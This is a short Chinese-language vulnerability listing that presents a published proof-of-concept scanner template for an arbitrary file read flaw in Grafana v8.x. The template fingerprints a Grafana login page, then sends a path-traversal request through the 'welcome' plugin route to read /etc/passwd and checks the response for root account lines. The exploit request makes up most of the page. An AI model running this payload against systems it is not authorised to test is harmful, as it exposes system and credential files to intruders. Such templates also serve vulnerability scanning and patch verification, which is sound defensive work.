grafana-file-read: Grafana v8.x Arbitrary File Read

日期: 2025-09-01 | 影响软件: Grafana | POC: 已公开

漏洞描述

app="Grafana_Labs-公司产品"

PoC代码[已公开]

id: grafana-file-read

info:
    name: Grafana v8.x Arbitrary File Read
    author: zan8in
    severity: high
    description: |
        app="Grafana_Labs-公司产品"

rules:
    r0:
        request:
            method: GET
            path: /login
        expression: response.status == 200 && response.body.bcontains(b'<title>Grafana</title>')
    r1:
        request:
            method: GET
            path: /public/plugins/welcome/../../../../../../../../../../../../../../../../../../../etc/passwd
        expression: response.status == 200 && "root:.*?:[0-9]*:[0-9]*:".bmatches(response.body)
expression: r0() && r1()

相关漏洞推荐